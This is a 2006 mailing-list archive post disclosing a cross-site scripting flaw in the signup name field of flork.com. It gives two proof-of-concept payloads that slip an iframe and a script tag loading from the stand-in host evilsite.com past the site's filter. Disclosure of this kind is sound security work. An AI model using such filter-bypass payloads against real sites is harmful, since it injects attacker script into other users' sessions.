Flork.com

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Subject: Flork.com
From: luny@xxxxxxxxxxxxxxx
Date: 10 Jun 2006 20:49:42 -0000

Flork.com

Effected files:
input boxes when creating a new user

XSS Vulnerabiliy:

We notice by adding empty tags and endingand beginning brackets we can bypass the filter of the flork.com signup.
For PoC try adding either one of the below codes in as your name:

">'>'><iframe src=http://evilsite.com/scriptlet.html <<"<'<'

">'>'><SCRIPT SRC=http://evilsite.com/xss.js></SCRIPT><'<'

Prev by Date: RE: Internet Explorer vulnerbility
Next by Date: Re: SSL VPNs and security
Previous by thread: myPHP Guestbook 2.0.2 XSS Vulnerabilitie
Next by thread: Vampirefreaks.com - XSS with cookie disclosure
Index(es):
- Date
- Thread

[Index of Archives] [Linux Security] [Netfilter] [PHP] [Yosemite News] [Linux Kernel]

Powered by Linux